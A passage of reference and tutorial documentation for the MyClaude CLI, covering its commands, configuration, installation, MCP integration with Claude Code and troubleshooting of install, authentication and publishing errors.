myclaude.sh/p/your-username-my-first-skill ``` Validate without publishing: ```bash $ myclaude publish --dry-run # Validating vault.yaml... OK # Scanning content... OK # Dry run complete. No files uploaded. ``` Publish a pre-release version with a tag: ```bash $ myclaude publish --tag beta # Validating vault.yaml... OK # Scanning content... OK # Uploading files... OK # Creating listing (tag: beta)... OK # # Published: myclaude.sh/p/your-username-my-first-skill (beta) ``` --- ## list **Synopsis** ``` myclaude list [--category ] [--json] ``` **Description** Lists all products currently installed in the local environment. Output includes the product handle, installed version, category, and install path. Products are sorted alphabetically by handle. `myclaude list` does not require authentication. It reads only from the local install registry at `~/.myclaude/installed.json`. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--category` | string | No | — | Filter listed products by category. Accepted values match `vault.yaml` category enum. | | `--json` | boolean | No | `false` | Output the list as a JSON array. Useful for scripting and tooling integrations. | **Examples** List all installed products: ```bash $ myclaude list # Installed products (2) # @kairo/review-skill 1.2.0 skill .claude/skills/review-skill/ # @dev/pr-checker 0.9.1 skill .claude/skills/pr-checker/ ``` Filter by category: ```bash $ myclaude list --category skill # Installed products — skill (2) # @kairo/review-skill 1.2.0 .claude/skills/review-skill/ # @dev/pr-checker 0.9.1 .claude/skills/pr-checker/ ``` Machine-readable JSON output for use in scripts: ```bash $ myclaude list --json # [ # { "handle": "@kairo/review-skill", "version": "1.2.0", "category": "skill", "path": ".claude/skills/review-skill/" }, # { "handle": "@dev/pr-checker", "version": "0.9.1", "category": "skill", "path": ".claude/skills/pr-checker/" } # ] ``` --- ## info **Synopsis** ``` myclaude info <@creator/product> [--version ] [--json] ``` **Description** Fetches and displays metadata for a marketplace product. Output includes the product handle, description, category, current version, all published versions, author, license, price, star rating, and download count. `myclaude info` does not require authentication and makes a read-only request to the public marketplace API. It does not modify any local state. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--version` | string | No | `latest` | Show metadata for a specific published version instead of the latest. | | `--json` | boolean | No | `false` | Output the full metadata object as JSON. | **Examples** Show details for the latest version: ```bash $ myclaude info @kairo/review-skill # @kairo/review-skill # Description: Performs systematic code review with security and style analysis. # Category: skill # Version: 1.2.0 # Versions: 1.0.0, 1.1.0, 1.2.0 # Author: @kairo # License: MIT # Price: free # Rating: ★ 4.9 (312 reviews) # Downloads: 8,441 ``` Show metadata for a specific version: ```bash $ myclaude info @kairo/review-skill --version 1.1.0 # @kairo/review-skill@1.1.0 # ... ``` Output as JSON for programmatic use: ```bash $ myclaude info @kairo/review-skill --json # { "handle": "@kairo/review-skill", "version": "1.2.0", "category": "skill", ... } ``` --- ## init **Synopsis** ``` myclaude init [--category ] [--author ] ``` **Description** Scaffolds a new product directory with the required files for the specified category. If `--category` is not provided, defaults to `skill`. The directory is created in the current working directory with the name given as the first argument. Generated files are pre-populated with placeholder content and comments explaining each field. No files are uploaded and no network requests are made — `myclaude init` operates entirely locally. **Default files by category** | Category | Files created | |----------|--------------| | `skill` | `vault.yaml`, `SKILL.md` | | `squad` | `vault.yaml`, `SQUAD.md` | | `agent` | `vault.yaml`, `AGENT.md` | | `workflow` | `vault.yaml`, `WORKFLOW.md` | | `design-system` | `vault.yaml`, `DESIGN-SYSTEM.md`, `tokens.css` | | `prompt` | `vault.yaml`, `PROMPT.md` | | `claude-md` | `vault.yaml`, `CLAUDE.md` | | `application` | `vault.yaml`, `APP.md` | **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--category` | string | No | `skill` | Product category to scaffold. Determines which files are created and the `vault.yaml` template used. | | `--author` | string | No | Current authenticated username | Pre-fill the `author` field in `vault.yaml`. If not authenticated, defaults to an empty placeholder. | **Examples** Scaffold a skill (default category): ```bash $ myclaude init my-review-skill # Created my-review-skill/ # vault.yaml # SKILL.md ``` Scaffold an agent: ```bash $ myclaude init typescript-agent --category agent # Created typescript-agent/ # vault.yaml # AGENT.md ``` Scaffold with author pre-filled: ```bash $ myclaude init my-workflow --category workflow --author kairo # Created my-workflow/ # vault.yaml # WORKFLOW.md ``` --- ## scan **Synopsis** ``` myclaude scan [path] [--strict] [--json] ``` **Description** Runs the content policy scanner on a product directory without publishing. Detects content that would fail the pre-publish pipeline: policy violations, malformed `vault.yaml`, missing required files, and version constraint errors. When called without a `path` argument, scans the current working directory. When a path is provided, scans that directory. `myclaude scan` is a strict superset of the validation step that runs inside `myclaude publish`. Running `myclaude scan` before `myclaude publish` guarantees that the publish pipeline will not fail on validation or scanning errors. It does not guarantee that the upload or listing creation steps will succeed. `myclaude scan` does not require authentication and does not make any network requests. It operates entirely on local files. **Flags** | Flag | Type | Required | Default | Description | |------|------|----------|---------|-------------| | `--strict` | boolean | No | `false` | Treat warnings as errors. A warning-only scan exits with code 0 normally; with `--strict` it exits with code 1. | | `--json` | boolean | No | `false` | Output scan results as JSON. Includes arrays for `errors`, `warnings`, and `info` messages. | **Exit codes** | Code | Meaning | |------|---------| | `0` | Scan passed with no errors. Warnings may be present. | | `1` | Scan found one or more errors. Publish would fail. | | `1` | Scan found warnings and `--strict` was set. | **Examples** Scan the current directory: ```bash $ myclaude scan # Scanning ./ ... # Validating vault.yaml... OK # Checking required files... OK # Running content policy... OK # Scan complete. No issues found. ``` Scan a specific path and treat warnings as errors: ```bash $ myclaude scan ./my-review-skill --strict # Scanning ./my-review-skill/ ... # Validating vault.yaml... OK # Checking required files... OK # Running content policy... # WARNING: description is 158/160 characters. Consider shortening. # Strict mode: 1 warning treated as error. # exit code: 1 ``` Machine-readable output for CI integration: ```bash $ myclaude scan --json # { # "passed": true, # "errors": [], # "warnings": [ # { "field": "description", "message": "158/160 characters. Consider shortening." } # ] # } ``` --- ## Global flags These flags are accepted by every command. | Flag | Type | Default | Description | |------|------|---------|-------------| | `--help`, `-h` | boolean | `false` | Print usage information for the command and exit. | | `--version`, `-v` | boolean | `false` | Print the CLI version and exit. | | `--quiet`, `-q` | boolean | `false` | Suppress all output except errors. Useful in scripts. | | `--no-color` | boolean | `false` | Disable ANSI color codes in output. Set automatically when `NO_COLOR` environment variable is present. | --- ## Exit codes | Code | Meaning | |------|---------| | `0` | Command completed successfully | | `1` | General error (validation failure, file not found, etc.) | | `2` | Authentication error (not logged in, token expired) | | `3` | Network error (API unreachable, timeout) | | `4` | Permission error (attempting to publish as a different author, etc.) | --- ## Related pages - [CLI Installation](/docs/cli/installation) — install the CLI and set up authentication - [vault.yaml Specification](/docs/creators/vault-yaml) — complete field reference for product manifests - [Publishing Your First Product](/docs/creators/publishing) — step-by-step publish tutorial - [Installing Products via CLI](/docs/buyers/install-cli) — buyer walkthrough for install and manage --- # CLI Configuration The MyClaude CLI reads settings from `~/.myclaude/config.json` and respects `MYCLAUDE_*` environment variables with a clear precedence chain. This reference covers every configurable setting, how to override settings with environment variables, the precedence order, and the config management commands. ## Configuration file The CLI stores its configuration at `~/.myclaude/config.json`. This file is created automatically when you run `myclaude login` and contains both session metadata and user preferences. ### File location | Platform | Path | |----------|------| | macOS | `~/.myclaude/config.json` | | Linux | `~/.myclaude/config.json` | | Windows | `%USERPROFILE%\.myclaude\config.json` | The `~/.myclaude/` directory is created with `700` permissions on Unix systems. On Windows, it inherits the user profile directory permissions. ### Full schema ```json { "uid": "abc123def456", "email": "you@example.com", "username": "your-username", "displayName": "Your Name", "apiKey": "AIzaSy...", "registry": "https://myclaude.sh", "default_category": "skill", "color": true, "quiet": false, "auto_update_check": true } ``` ### Field reference | Field | Type | Default | Set by | Description | |-------|------|---------|--------|-------------| | `uid` | string | -- | `myclaude login` | Firebase user ID. Set automatically on login. | | `email` | string | -- | `myclaude login` | Account email address. Set automatically on login. | | `username` | string | -- | `myclaude login` | MyClaude username. Set automatically on login. | | `displayName` | string | -- | `myclaude login` | Display name from profile. Set automatically on login. | | `apiKey` | string | -- | `myclaude login` | Firebase public API key. Used for token refresh. Not a secret. | | `registry` | string | `"https://myclaude.sh"` | User | API endpoint URL. Override to point to a staging or self-hosted instance. | | `default_category` | string | `"skill"` | User | Default category used by `myclaude init` when `--category` is not specified. | | `color` | boolean | `true` | User | Enable or disable ANSI color codes in terminal output. | | `quiet` | boolean | `false` | User | Suppress all output except errors. Equivalent to passing `--quiet` on every command. | | `auto_update_check` | boolean | `true` | User | Check for newer CLI versions on launch. Prints a notice if an update is available. Does not auto-install. | Fields set by `myclaude login` (uid, email, username, displayName, apiKey) should not be edited manually. They are overwritten on the next login. ## Environment variable overrides Environment variables override config file settings. All CLI-specific variables use the `MYCLAUDE_` prefix. | Variable | Overrides | Type | Description | |----------|-----------|------|-------------| | `MYCLAUDE_TOKEN` | Stored keychain credentials | string | Authentication token. When set, the CLI skips keychain lookup and uses this token directly. Primary method for CI/CD authentication. | | `MYCLAUDE_REGISTRY` | `registry` in config.json | string | API endpoint URL. Useful for pointing the CLI at a staging environment without modifying the config file. | | `MYCLAUDE_NO_COLOR` | `color` in config.json | any | Disable ANSI colors when set to any non-empty value. Takes effect regardless of value. | | `NO_COLOR` | `color` in config.json | any | Standard `NO_COLOR` convention (see [no-color.org](https://no-color.org)). Disables colors when set to any non-empty value. Equivalent to `MYCLAUDE_NO_COLOR`. | | `MYCLAUDE_QUIET` | `quiet` in config.json | any | Suppress non-error output when set to any non-empty value. | ### Example: CI/CD environment ```bash export MYCLAUDE_TOKEN="eyJhbGciOiJSUzI1NiJ9..." export MYCLAUDE_REGISTRY="https://staging.myclaude.sh" export MYCLAUDE_NO_COLOR=1 export MYCLAUDE_QUIET=1 myclaude publish --dry-run # (authenticates via MYCLAUDE_TOKEN, targets staging, no colors, minimal output) ``` ### Example: disable color for a single command ```bash $ NO_COLOR=1 myclaude search "testing" ``` ## Precedence chain When the same setting is specified in multiple places, the CLI resolves them in this order, from highest to lowest priority: ``` 1. Command-line flags (--quiet, --no-color, --token) 2. Environment variables (MYCLAUDE_TOKEN, MYCLAUDE_REGISTRY, NO_COLOR) 3. Config file (~/.myclaude/config.json) 4. Built-in defaults ``` A command-line flag always wins. An environment variable overrides the config file. The config file overrides built-in defaults. ### Precedence examples | Setting | Flag value | Env var value | Config value | Resolved value | |---------|-----------|---------------|-------------|----------------| | Color output | `--no-color` | (not set) | `true` | Disabled (flag wins) | | Color output | (not passed) | `NO_COLOR=1` | `true` | Disabled (env var wins) | | Color output | (not passed) | (not set) | `false` | Disabled (config wins) | | Color output | (not passed) | (not set) | (not set) | Enabled (default) | | Authentication | `--token xyz` | `MYCLAUDE_TOKEN=abc` | keychain | Uses `xyz` (flag wins) | | Authentication | (not passed) | `MYCLAUDE_TOKEN=abc` | keychain | Uses `abc` (env var wins) | | Registry | (not passed) | `MYCLAUDE_REGISTRY=https://staging...` | `https://myclaude.sh` | Uses staging URL (env var wins) | ## Config management commands The CLI provides subcommands for reading and writing configuration values without editing the JSON file manually. ### myclaude config set Write a configuration value: ```bash $ myclaude config set default_category agent # Set default_category = "agent" ``` ```bash $ myclaude config set color false # Set color = false ``` ```bash $ myclaude config set registry https://staging.myclaude.sh # Set registry = "https://staging.myclaude.sh" ``` Only user-configurable fields (`registry`, `default_category`, `color`, `quiet`, `auto_update_check`) can be set with this command. Attempting to set session fields (uid, email, username, displayName, apiKey) returns an error. ### myclaude config get Read a single configuration value: ```bash $ myclaude config get default_category # skill ``` ```bash $ myclaude config get registry # https://myclaude.sh ``` Returns the resolved value after applying the precedence chain. If an environment variable overrides the config file value, the resolved (effective) value is returned. ### myclaude config list Display all configuration values and their sources: ```bash $ myclaude config list # uid abc123def456 (login) # email you@example.com (login) # username your-username (login) # displayName Your Name (login) # apiKey AIzaSy... (login) # registry https://myclaude.sh (default) # default_category skill (default) # color true (default) # quiet false (default) # auto_update_check true (default) ``` When an environment variable overrides a setting, the source column reflects it: ```bash $ MYCLAUDE_NO_COLOR=1 myclaude config list # ... # color false (env: MYCLAUDE_NO_COLOR) # ... ``` ### myclaude config reset Reset a user-configurable field to its default value: ```bash $ myclaude config reset default_category # Reset default_category to default: "skill" ``` ## Per-project configuration Per-project configuration via a `.vaultrc` file is planned for a future release. When available, `.vaultrc` will sit between the config file and built-in defaults in the precedence chain: ``` 1. Command-line flags 2. Environment variables 3. Config file (~/.myclaude/config.json) 4. Project file (.vaultrc) <-- future 5. Built-in defaults ``` The `.vaultrc` file will support the same user-configurable fields as `config.json` and will be discovered by walking up the directory tree from the current working directory. ## Credential storage Authentication credentials are stored separately from the config file. See [CLI Authentication](/docs/cli/authentication) for the full credential storage model. In brief: | Credential | Storage | Priority | |------------|---------|----------| | Refresh token | OS keychain (service: `vault-marketplace`) | Default | | Refresh token | `~/.myclaude/credentials` (chmod 600) | Fallback when keychain unavailable | | Auth token | `MYCLAUDE_TOKEN` environment variable | CI/CD override (highest priority) | The config file (`config.json`) never contains tokens. It contains only the public API key and session metadata needed for display purposes and token refresh. ## File permissions | File | Unix permissions | Purpose | |------|-----------------|---------| | `~/.myclaude/` | `700` (drwx------) | Config directory | | `~/.myclaude/config.json` | `600` (-rw-------) | Configuration | | `~/.myclaude/credentials` | `600` (-rw-------) | Fallback token storage | | `~/.myclaude/installed.json` | `644` (-rw-r--r--) | Local install registry | On Windows, files inherit the user profile permissions. The CLI does not modify Windows ACLs. ## Related pages - [CLI Authentication](/docs/cli/authentication) -- how login, token storage, and refresh work - [CLI Commands Reference](/docs/cli/commands) -- complete reference for all 12 commands - [CLI Troubleshooting](/docs/cli/troubleshooting) -- common configuration and auth issues --- # CLI Installation Install the MyClaude CLI globally via npm: `npm install -g @myclaude-cli/cli`. This tutorial covers requirements, installation, version verification, and initial authentication. Completion time: under 3 minutes on a machine that already has Node.js. ## Requirements | Requirement | Minimum version | Check | |-------------|-----------------|-------| | Node.js | 18.0.0 | `node --version` | | npm | 9.0.0 | `npm --version` | | Internet access | — | Required for install and auth | Node.js 18 is the minimum because the CLI uses the native `fetch` API and `node:crypto` module, both stable since Node 18. Earlier versions will fail at runtime with a module resolution error. If your system Node.js is below 18, use [nvm](https://github.com/nvm-sh/nvm) to install a current LTS release: ```bash $ nvm install --lts $ nvm use --lts $ node --version # v22.x.x ``` ## Install Run the global install command: ```bash $ npm install -g @myclaude-cli/cli ``` Expected output: ``` added 47 packages in 4s @myclaude-cli/cli@0.1.0 installed globally ``` The install places the `myclaude` binary in your npm global bin directory. If npm global bin is not in your `PATH`, see [Troubleshooting](#troubleshooting) below. ## Verify Confirm the binary is reachable and the version is correct: ```bash $ myclaude --version # myclaude-cli 0.1.0 ``` If this command returns `command not found`, the npm global bin directory is not in your `PATH`. See [Troubleshooting](#troubleshooting). ## Authentication All CLI commands that communicate with MyClaude (search, install, publish, and others) require an authenticated session. Run: ```bash $ myclaude login ``` The CLI opens your default browser to the MyClaude authentication page. Complete sign-in there, then return to the terminal. On success: ``` Authenticated as @your-username Session stored at ~/.myclaude/credentials.json ``` Your session token is stored locally at `~/.myclaude/credentials.json`. The token does not expire during normal use. It is invalidated only when you run `myclaude logout` or revoke access from your MyClaude account settings. To confirm your session at any time: ```bash $ myclaude whoami # Logged in as @your-username ``` ## Troubleshooting ### Command not found after install The `myclaude` binary is placed in the npm global bin directory. If `myclaude` is not found after install, that directory is not in your shell's `PATH`. Find the npm global bin directory: ```bash $ npm bin -g # /home/user/.npm-global/bin (Linux/macOS example) # C:\Users\user\AppData\Roaming\npm (Windows example) ``` Add that path to your shell profile (`~/.bashrc`, `~/.zshrc`, or equivalent) and reload: ```bash $ echo 'export PATH="$(npm bin -g):$PATH"' >> ~/.zshrc $ source ~/.zshrc $ myclaude --version ``` ### Permission denied on global install (Linux/macOS) Running `npm install -g` with `sudo` is not recommended. Instead, configure npm to use a user-owned directory: ```bash $ mkdir -p ~/.npm-global $ npm config set prefix ~/.npm-global $ echo 'export PATH="$HOME/.npm-global/bin:$PATH"' >> ~/.zshrc $ source ~/.zshrc $ npm install -g @myclaude-cli/cli ``` ### Windows: myclaude not recognized On Windows, npm global installs go to `%APPDATA%\npm`. Verify this directory is in your system `PATH` via System Properties → Environment Variables. After adding it, restart your terminal. ### Browser does not open during myclaude login If `myclaude login` prints a URL but does not open a browser, copy the URL from the terminal output and open it manually. Authentication completes the same way regardless of whether the browser was launched automatically. ## Related pages - [CLI Commands Reference](/docs/cli/commands) — complete reference for all 12 commands - [Quickstart](/docs/getting-started/quickstart) — full end-to-end flow from install to first product - [Installing Products via CLI](/docs/buyers/install-cli) — buyer-specific install walkthrough --- # MCP Integration MyClaude products integrate with Claude Code through the Model Context Protocol, making marketplace tools available directly inside coding sessions. This page explains what MCP is, how the MyClaude CLI exposes marketplace functionality as MCP tools, how installed products become available in Claude Code, and when to use MCP tools versus Skills versus Agents. ## What is MCP The Model Context Protocol (MCP) is a standard for tool communication between AI assistants and external systems. It defines how an AI model discovers available tools, invokes them with structured parameters, and receives structured results. MCP uses JSON-RPC 2.0 over standard I/O (stdin/stdout) as its transport layer. In practical terms, MCP lets Claude Code call external programs the same way a developer calls CLI commands -- but with structured input and output instead of unstructured text. When a tool is registered via MCP, Claude Code can: - **Discover** the tool's name, description, and parameter schema - **Invoke** the tool with validated parameters - **Read** the structured response and act on it MCP servers are standalone processes that register tools, resources, and prompts. Claude Code connects to them over stdio and treats their tools as first-class capabilities within a coding session. ## How MyClaude uses MCP The MyClaude CLI includes a built-in MCP server mode. When started with `myclaude mcp-serve`, the CLI runs as a long-lived process that speaks the MCP protocol over stdin/stdout. It exposes five tools that map directly to CLI commands: | MCP Tool | Maps to CLI command | Description | |----------|-------------------|-------------| | `vault_search` | `myclaude search` | Search the marketplace for products | | `vault_install` | `myclaude install` | Install a product into the current project | | `vault_info` | `myclaude info` | Retrieve detailed product metadata | | `vault_list` | `myclaude list` | List locally installed products | | `vault_update` | `myclaude update` | Update installed products to latest versions | Both the CLI commands and the MCP tools call the same shared core logic. There is no difference in behavior, validation, or security between using `myclaude install @creator/product` in a terminal and having Claude Code invoke the `vault_install` tool. The same authentication, the same API endpoints, the same checksum verification. ### Authentication in MCP mode The MCP server reuses your existing CLI authentication. It reads the refresh token from the OS keychain (or the `MYCLAUDE_TOKEN` environment variable) and exchanges it for an ID token, exactly as the CLI does. There is no separate login flow for MCP mode. If you are not authenticated when Claude Code starts the MCP server, tools that require auth will return a structured error: ```json { "error": { "code": -32001, "message": "Not authenticated. Run 'myclaude login' in your terminal first." } } ``` ### Confirmation for destructive operations MCP tools that involve purchases or file deletion use MCP's built-in confirmation mechanism. When Claude Code invokes `vault_install` for a paid product, the MCP server returns a confirmation prompt that Claude Code surfaces to the user before proceeding. You are always asked before money is spent or files are removed. ## Setting up MCP in Claude Code ### Automatic setup Run `myclaude setup-mcp` to automatically register the MyClaude MCP server in your Claude Code configuration: ```bash $ myclaude setup-mcp # Added myclaude MCP server to .claude/settings.json ``` This writes the following entry to `.claude/settings.json`: ```json { "mcpServers": { "myclaude": { "command": "myclaude", "args": ["mcp-serve"] } } } ``` After running this command, restart your Claude Code session. The MCP server starts automatically when Claude Code launches and stays running for the duration of the session. ### Manual setup If you prefer to configure MCP manually, add the `mcpServers` entry to `.claude/settings.json` yourself: ```json { "mcpServers": { "myclaude": { "command": "myclaude", "args": ["mcp-serve"] } } } ``` Ensure the `myclaude` binary is in your `PATH`. If it is not, use the full path to the binary: ```json { "mcpServers": { "myclaude": { "command": "/home/user/.npm-global/bin/myclaude", "args": ["mcp-serve"] } } } ``` ### Verifying the connection After restarting Claude Code, verify the MCP server is running by asking Claude Code to list your installed products: ``` > List my installed MyClaude products. ``` If the MCP server is correctly configured, Claude Code will invoke the `vault_list` tool and return the results. If it is not, Claude Code will not recognize the tool and will say it cannot help with that request. ## Example workflow Here is what it looks like in practice: installing a code review skill from within a Claude Code session, entirely through MCP. **Step 1:** You ask Claude Code to find a code review tool. ``` > Search MyClaude for code review skills. ``` Claude Code invokes `vault_search` with the query "code review" and the category filter "skill". It receives a structured list of matching products and presents them to you. **Step 2:** You ask Claude Code to install one. ``` > Install @kairo/review-skill. ``` Claude Code invokes `vault_install` with the product handle. The MCP server downloads the product, verifies the checksum, extracts files to `.claude/skills/review-skill/`, and updates the local install registry. Claude Code reports the result. **Step 3:** The skill is immediately available. Because the product installed to `.claude/skills/`, Claude Code can use it in the same session. You can now reference the skill by name: ``` > Use the review-skill to review the changes in this PR. ``` The entire flow happens inside Claude Code. You never switch to a terminal. ## How installed products expose capabilities When you install a MyClaude product via `myclaude install` (either from the terminal or through the MCP `vault_install` tool), the product's files are placed in the `.claude/` directory tree. Different product types serve different purposes: | Product type | Install location | What it provides to Claude Code | |-------------|-----------------|-------------------------------| | Skill | `.claude/skills//` | A `SKILL.md` file that defines an invocable capability with instructions, rules, and examples | | Squad | `.claude/skills//` | A `SQUAD.md` that defines a multi-persona collaboration pattern | | Agent | `.claude/skills//` | An `AGENT.md` that defines an autonomous task execution pattern | | Workflow | `.claude/skills//` | A `WORKFLOW.md` that defines a multi-step process | | Design system | `.claude/skills//` | A `DESIGN-SYSTEM.md` with tokens and rules for UI consistency | | Prompt | `.claude/skills//` | A `PROMPT.md` with reusable prompt templates | | CLAUDE.md | `.claude/` | Content that merges into the project's CLAUDE.md | | Application | `.claude/apps//` | A standalone application package | Claude Code discovers installed skills by scanning the `.claude/skills/` directory on startup. Each subdirectory that contains a recognized markdown file (SKILL.md, AGENT.md, etc.) becomes an invocable capability. The MCP server itself does not provide these capabilities. It provides the marketplace tools (search, install, list, update, info). The installed products provide their own capabilities through the Claude Code skills system. ## Architecture diagram ``` +---------------------------+ | Claude Code | | | | +---------+ +---------+ | | | Skills | | MCP | | | | System | | Client | | | +----+----+ +----+----+ | | | | | +-------+------------+-------+ | | | | JSON-RPC 2.0 (stdio) | | +-------+----+ +----+------------+ | .claude/ | | myclaude mcp-serve | | skills/ | | | | (installed | | vault_search | | products) | | vault_install | +------------+ | vault_info | | vault_list | | vault_update | +--------+--------+ | | HTTPS | +--------+--------+ | MyClaude API | | (myclaude.sh) | +-----------------+ ``` The left path is the skills system: Claude Code reads installed product files from `.claude/skills/` and uses them as capabilities. The right path is the MCP integration: Claude Code communicates with the MyClaude marketplace through the MCP server to search, install, and manage products. ## MCP tools vs Skills vs Agents These three concepts serve different purposes and operate at different layers. Understanding the distinction helps you choose the right product type to install or create. | Concept | What it is | When to use | Example | |---------|-----------|-------------|---------| | **MCP tools** | Functions exposed by an external server via the Model Context Protocol | When Claude Code needs to interact with an external system (API, database, marketplace) | `vault_search`, `vault_install`, GitHub MCP tools | | **Skills** | Markdown files in `.claude/skills/` that define capabilities with instructions and rules | When you want to give Claude Code domain expertise or a repeatable process | Code review skill, security audit skill, design system enforcement | | **Agents** | A specialized skill pattern where Claude Code operates autonomously on a multi-step task | When the task requires planning, multiple tool calls, and decision-making without human intervention per step | Deployment agent, migration agent, test-writing agent | MCP tools are the transport layer -- they connect Claude Code to external systems. Skills are the knowledge layer -- they tell Claude Code how to approach a problem. Agents are the autonomy layer -- they combine skills and tools into self-directed workflows. A typical advanced setup uses all three together: MCP tools to connect to external APIs, skills to encode domain knowledge, and an agent orchestration pattern to tie them into an autonomous workflow. ## Future: marketplace-native MCP tool discovery Today, the MCP server exposes marketplace management tools (search, install, list). In a future release, individual MyClaude products will be able to register their own MCP tools during installation. For example, a database migration skill could expose an MCP tool that runs migrations, or a monitoring product could expose a tool that queries metrics. When this capability ships, installing a product will automatically register its MCP tools, making them discoverable by Claude Code without manual configuration. The product's `vault.yaml` will declare its MCP tool schema, and the MyClaude MCP server will proxy those tools alongside the built-in marketplace tools. This creates a composable tool ecosystem: install a product, get its tools. No configuration, no glue code. ## Related pages - [CLI Commands Reference](/docs/cli/commands) -- full reference for all CLI commands including `mcp-serve` - [CLI Authentication](/docs/cli/authentication) -- how the MCP server authenticates with MyClaude - [CLI Configuration](/docs/cli/configuration) -- MCP server inherits CLI configuration and environment variables --- # CLI Troubleshooting Troubleshooting guide for the MyClaude CLI covering installation, authentication, publishing, product installation, and network issues. Each entry follows the pattern: symptom, cause, solution. If you do not find your issue here, open an issue on [GitHub](https://github.com/anthropics/myclaude-cli/issues). ## Installation issues ### "command not found: myclaude" after install **Cause:** The npm global bin directory is not in your shell's `PATH`. **Solution:** Find the directory and add it to your PATH: ```bash $ npm bin -g # /home/user/.npm-global/bin $ echo 'export PATH="$(npm bin -g):$PATH"' >> ~/.zshrc $ source ~/.zshrc $ myclaude --version ``` On Windows, the global bin is typically `%APPDATA%\npm`. Add it via System Properties, Environment Variables, then restart your terminal. ### "permission denied" during global install on Linux or macOS **Cause:** npm is trying to write to a system-owned directory (e.g., `/usr/local/lib`). **Solution:** Configure npm to use a user-owned prefix instead of using `sudo`: ```bash $ mkdir -p ~/.npm-global $ npm config set prefix ~/.npm-global $ echo 'export PATH="$HOME/.npm-global/bin:$PATH"' >> ~/.zshrc $ source ~/.zshrc $ npm install -g @myclaude-cli/cli ``` Do not run `npm install -g` with `sudo`. It causes file ownership problems that affect all global packages. ### "unsupported engine" or "node: not found" **Cause:** Node.js is not installed or the installed version is below the minimum requirement (18.0.0). **Solution:** Install a current LTS release: ```bash $ nvm install --lts $ nvm use --lts $ node --version # v22.x.x ``` If you do not have nvm, download Node.js directly from [nodejs.org](https://nodejs.org). The CLI requires Node.js 18+ because it depends on the native `fetch` API and `node:crypto` module. ### "myclaude" resolves to a different program **Cause:** Another program named `myclaude` is in your PATH ahead of the npm global bin. **Solution:** Check which binary is resolving: ```bash $ which myclaude # /usr/local/bin/myclaude <-- not the MyClaude CLI you expected $ npm bin -g # /home/user/.npm-global/bin ``` Either reorder your PATH to place the npm global bin first, or invoke the MyClaude CLI explicitly: ```bash $ npx @myclaude-cli/cli --version ``` Alternatively, create an alias in your shell profile: ```bash $ echo 'alias mcli="$(npm bin -g)/myclaude"' >> ~/.zshrc $ source ~/.zshrc ``` ### Windows: "execution policy" error in PowerShell **Cause:** PowerShell's execution policy blocks the npm shim script. **Solution:** Allow locally installed scripts to run: ```powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned ``` Then restart PowerShell and retry `myclaude --version`. ## Authentication issues ### "Error: not authenticated. Run myclaude login." **Cause:** No stored credentials found. You have not logged in yet, or a previous `myclaude logout` cleared your session. **Solution:** ```bash $ myclaude login ``` ### "Error: session expired." **Cause:** Your refresh token has exceeded its lifetime. Refresh tokens expire after 90 days of issue or after 10 days of inactivity (whichever comes first). **Solution:** ```bash $ myclaude login ``` This creates a new session. No data is lost -- your installed products, purchase history, and published products are unaffected. ### "Error: invalid credentials." **Cause:** Incorrect email or password. **Solution:** Double-check your email address and password. If you have forgotten your password, reset it at [myclaude.sh/forgot-password](https://myclaude.sh/forgot-password). The CLI does not support password reset flows. ### "Error: keychain access denied." **Cause:** The CLI cannot read from or write to the OS keychain. On macOS, this can happen when keychain access is denied by a system prompt. On Linux, the Secret Service API may not be running. **Solution:** - **macOS:** Open Keychain Access, search for `vault-marketplace`, and verify the CLI has access. If prompted by the system, click "Always Allow". - **Linux:** Ensure `gnome-keyring-daemon` or `kwallet` is running. In a headless environment, use `MYCLAUDE_TOKEN` instead. - **Windows:** Verify Credential Manager is accessible. Run `cmdkey /list` to check. If you cannot resolve keychain access, use the environment variable override: ```bash $ export MYCLAUDE_TOKEN="your-token-here" ``` ### "Warning: keychain unavailable, using file fallback." **Cause:** No OS keychain detected. Common on headless servers, Docker containers, and some WSL configurations. **Solution:** This is not an error -- the CLI falls back to storing the refresh token at `~/.myclaude/credentials` with `chmod 600`. For CI/CD environments, prefer `MYCLAUDE_TOKEN` over the file fallback. See [CLI Authentication](/docs/cli/authentication) for details. ### myclaude whoami shows the wrong account **Cause:** You logged in with a different account than intended. **Solution:** ```bash $ myclaude logout $ myclaude login # Email: correct-account@example.com ``` ## Publishing issues ### "Error: version must be higher than currently published." **Cause:** The `version` field in your `vault.yaml` is equal to or lower than the version currently live on the marketplace. **Solution:** Increment the version in `vault.yaml` before publishing: ```yaml # vault.yaml version: "1.1.0" # was 1.0.0 ``` The CLI enforces monotonically increasing SemVer versions. You cannot re-publish the same version number. ### "Error: content policy violation." **Cause:** The pre-publish content scanner detected a policy violation in your product files. **Solution:** Run `myclaude scan` to see the specific violations: ```bash $ myclaude scan # Scanning ./ ... # ERROR: SKILL.md line 42 — detected pattern: Stripe Secret Key # Scan failed. 1 error found. ``` Fix the flagged content, or if the detection is a false positive, add the file to `.vaultignore`: ``` # .vaultignore test-fixtures/mock-keys.txt ``` ### "Error: secret detected in product files." **Cause:** The secret scanner found what appears to be an API key, private key, or credential in your product files. This is a hard blocker -- the CLI will not publish until the issue is resolved. **Solution:** Remove the secret from your product files. If the flagged content is a false positive (for example, a regex pattern in documentation that resembles a key), add the file to `.vaultignore`. The scanner checks for: - AWS access keys and secret keys - Firebase API keys - Stripe secret keys and webhook secrets - Private key headers (RSA, EC) - Generic token patterns (`api_key = "..."`) - `.env` files ### "Error: vault.yaml not found." **Cause:** You are running `myclaude publish` from a directory that does not contain a `vault.yaml` file. **Solution:** Either `cd` into the product directory, or run `myclaude init` to scaffold a new product: ```bash $ myclaude init my-product --category skill $ cd my-product $ myclaude publish ``` ### "Error: required field missing: description" **Cause:** A required field in `vault.yaml` is empty or absent. **Solution:** Run `myclaude scan` to see all missing fields, then fill them in: ```bash $ myclaude scan # ERROR: vault.yaml — required field missing: description # ERROR: vault.yaml — required field missing: author ``` ### "Error: author does not match authenticated user." **Cause:** The `author` field in `vault.yaml` does not match the username of the currently authenticated account. **Solution:** Update the `author` field to match your MyClaude username: ```yaml # vault.yaml author: "your-username" # must match myclaude whoami output ``` Or log in as the correct account: ```bash $ myclaude whoami # Logged in as @other-account $ myclaude logout && myclaude login # Email: correct@example.com ``` ## Product installation issues ### "Error: product not found." **Cause:** The product handle is misspelled, the product has been removed, or it has not passed admin review yet. **Solution:** Search for the product to verify its handle: 